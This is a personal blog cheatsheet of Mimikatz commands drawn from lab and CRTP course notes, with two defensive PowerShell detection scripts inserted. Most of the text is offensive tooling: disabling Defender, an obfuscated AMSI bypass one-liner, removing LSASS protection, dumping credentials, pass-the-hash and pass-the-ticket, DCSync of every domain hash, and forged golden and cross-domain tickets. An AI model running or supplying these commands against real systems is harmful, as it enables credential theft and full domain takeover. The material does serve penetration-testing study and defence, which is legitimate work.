Mimikatz Cheatsheet

Rich
Aug 26, 2022

TL;DR Mimikatz cheatsheet of things I have found useful in CRTP and the lab.

Welcome to Part I of our cheatsheet series compiled from various courses, labs, stuff we did at work, Google, etc. Most of this was spread out over various howtos. This puts it all in one place. These are cheatsheets, almost no explanation is given, just commands. The links are to howtos that provide background.

Part I: Mimikatz cheatsheet

Part II: Set-Acl cheatsheet

Part III: Get-Acl cheatsheet

Part IV: Enumerating AD cheatsheet

Part V: Windows reverse shells cheatsheet

Part VI: MS Graph PowerShell cheatsheet

Part VII: Hash cracking cheatsheet

Part VIII: The Credential Theft Shuffle

Part IX: SACLs & Querying Collected Logs

Part X: Setting up a simple AD lab in Azure

Background

Yes, this info is out there already, most notably Sean Metcalf’s Guide to Mimikatz. This is just my personal cheatsheet for Mimikatz compiled from my notes taken during various labs, the CRTP course, etc.

Please note that I was using Invoke-Mimikatz.ps1 most of the time, therefore my cheatsheet is heavy on commands in that syntax. Generally speaking, if you’re using the *.exe then just run what is inside the quotes. I am also partial to PowerShell_ISE.

Please note that you can run multiple commands with Invoke-Mimikatz.ps1 by simply enclosing the entire thing in single quotes and each command in double quotes. Example:

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::msv"'

Please note that Medium often mangles quotations, even in codeblocks. If you copy/paste a command and get an error then re-type the quotes in the CLI.

Running Mimikatz at all

Defender will block an unaltered copy of Mimikatz. Please do NOT rely on this alone in the workplace. Mimikatz is open source and freely available, therefore a dedicated attacker will simply modify it enough to not trip Defender. These researchers did it just to prove a point. Therefore focus on denying an attacker the rights needed to dump credentials. Failing that, focus on basic security hygiene so there isn’t anything usable in the dump.

With that disclaimer out of the way, here is how I have used Mimikatz in labs, CRTP, etc.

Launch PowerShell as admin, add a folder exception to Defender, turn off real time monitoring:

Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealTimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1

Alternatively you can often get away with just running the AMSI bypass if you can’t turn off Defender. I have used this tactic with PowerView and PowerUp in the past:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Bypassing LSA protection

Additionally, if Mimikatz has an issue with LSA protection, this can be disabled by the local admin. If this issue occurs you will likely see something along the lines of:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

This protection can be disabled by loading a Mimikatz driver, and credentials can then be dumped.

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
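As an added check from the defensive side (not part of the original cheatsheet): LSA protection is governed by the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, and the driver load used above has to register a kernel-driver service, which Windows records as System event 7045. The script below verifies the former and lists recent occurrences of the latter; the 7-day window is an assumption, and it must run in an elevated PowerShell.

```powershell
# Added example, not from the original post. Checks RunAsPPL and hunts for
# recent kernel-driver service installs (System event 7045) on this host.
function Get-LsaProtectionState {
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $value = $lsa.RunAsPPL
    if ($value -ge 1) {
        Write-Host "RunAsPPL = $value : LSASS runs as a protected process"
    } else {
        Write-Warning "RunAsPPL not set: LSASS is not protected and its memory can be read by any admin with SeDebugPrivilege"
    }
    return $value
}

function Get-RecentDriverServiceInstalls {
    param([int]$Days = 7)   # assumed look-back window
    $since = (Get-Date).AddDays(-$Days)
    # 7045 = "A service was installed in the system". Kernel drivers are installed
    # as services too, so the ServiceType field distinguishes them from user-mode services.
    Get-WinEvent -FilterHashtable @{LogName = 'System'; Id = 7045; StartTime = $since} -ErrorAction SilentlyContinue |
        ForEach-Object {
            $ev = $_
            $x  = [xml]$ev.ToXml()
            $d  = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time        = $ev.TimeCreated
                ServiceName = $d['ServiceName']
                ImagePath   = $d['ImagePath']
                ServiceType = $d['ServiceType']
                Account     = $d['AccountName']
            }
        } |
        Where-Object { $_.ServiceType -like '*kernel*' }
}

Get-LsaProtectionState | Out-Null
# Any driver installed from a user-writable path such as C:\Temp, or by an
# interactive account, deserves a closer look.
Get-RecentDriverServiceInstalls | Format-Table -AutoSize
```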

Dumping creds with Mimikatz

This is normally required first if running Mimikatz locally:

Invoke-Mimikatz -Command '"token::elevate"'
Invoke-Mimikatz -Command '"privilege::debug"'
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Please note that ‘logonpasswords’ lists everything except Credential Manager, as I found out once.

List the sekurlsa commands:

"sekurlsa::help"

Check Credential Manager for things like saved RDP passwords:

Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
Invoke-Mimikatz -Command '"sekurlsa::credman"'

If you are using mimikatz.exe:

Start-Process C:\Temp\mimikatz_trunk\x64\mimikatz.exe -Verb RunAs
token::elevate
privilege::debug
sekurlsa::msv

Other useful things to dump:

vault::cred #dump Credential Manager

lsadump::sam #dump the SAM

lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)

Pass-The-Hash (PTH) with Mimikatz

Explanation, lab demo, and mitigations are here.

PTH and launch PowerShell_ISE as that user:

Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp /ntlm:03df526c49c8684ebed22fdb3ec5c533 /run:PowerShell_ISE"'

Pass-The-Ticket (PTT) with Mimikatz

Explanation, lab demo, and mitigations are here.

Export & list tickets:

$sess = New-PSSession -ComputerName TestIPAM
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName TestIPAM
Invoke-Command -FilePath C:\Temp\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
mkdir etc
cd .\etc
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Copy/paste the name of the ticket to elevate with, then:

Invoke-Mimikatz -Command '"kerberos::ptt .\<ticket filename>"'

Confirm privileges:

Invoke-Command -ScriptBlock {hostname;whoami} -ComputerName TestDC

Show tickets currently in use:

klist

If you are having issues or getting weird errors, purge tickets and try again:

klist purge

Dump creds remotely with Mimikatz

This only requires that you are running as a Domain User who has local admin rights on the remote system.

Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName DC
Invoke-Mimikatz -DumpCreds -ComputerName DC

DCSync

Explanation & lab demo here.

Grab the krbtgt NTLM

Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\krbtgt"'

Forge a Golden Ticket using krbtgt hash & domain SID:

Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-1917967189-4054103991-136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ptt"'

Alternatively, save the ticket for future use:

kerberos::golden /domain:corp.local /sid:S-1-5-21-1917967189-4054103991-136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ticket:forged.kirbi
kerberos::ptt forged.kirbi
misc::cmd

Dump every hash in the domain into a file for use later:

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /dc:BackupDC4 /domain:test.local /all /csv"' | Export-Csv .\AllHashes.csv
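Added example from the defensive side (not part of the original post): every DCSync above is a replication request to the DC, which the DC records as Security event 4662 carrying the replication control-access-right GUIDs, provided Audit Directory Service Access is enabled and the domain naming context has a matching SACL. The 24-hour window and the exclusion of computer accounts (names ending in $) are lab assumptions.

```powershell
# Added example, not from the original post. Run on a domain controller (or against
# its forwarded Security log) to surface replication requests from non-DC principals.
function Find-DcSyncEvents {
    param([int]$Hours = 24)   # assumed look-back window
    # Control-access rights that grant directory replication; Mimikatz needs the first two.
    $replGuids = @(
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
        '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
    )
    $since = (Get-Date).AddHours(-$Hours)
    Get-WinEvent -FilterHashtable @{LogName = 'Security'; Id = 4662; StartTime = $since} -ErrorAction SilentlyContinue |
        ForEach-Object {
            $ev = $_
            $x  = [xml]$ev.ToXml()
            $d  = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            # The Properties field lists the GUIDs of the rights that were exercised.
            $hits = $replGuids | Where-Object { $d['Properties'] -match $_ }
            if ($hits) {
                [pscustomobject]@{
                    Time    = $ev.TimeCreated
                    Account = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                    Object  = $d['ObjectName']
                    Rights  = ($hits -join ',')
                }
            }
        } |
        # Domain controller computer accounts replicate legitimately; a user account
        # exercising these rights is what a DCSync from a workstation looks like.
        Where-Object { $_.Account -notlike '*$' }
}

Find-DcSyncEvents | Format-Table -AutoSize
```

Accounts that legitimately hold these rights outside the DCs (for example a directory synchronisation service account) should be added to the exclusion so the output stays actionable.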

Forge a ticket to use in a trusting domain

In this case we have compromised a child domain and want to escalate to the parent domain. There is a trust relationship between them.

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<child domain FQDN> /sid:<child domain SID> /sids:<parent domain SID>-519 /krbtgt:<child domain krbtgt NTLM> /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Load the ticket and start using privs in the parent domain:

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

References

Benjamin Delpy’s github with Mimikatz: https://github.com/ParrotSec/mimikatz

Sean Metcalf’s guide to Mimikatz: https://adsecurity.org/?page_id=1821

Microsoft Docs on klist: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
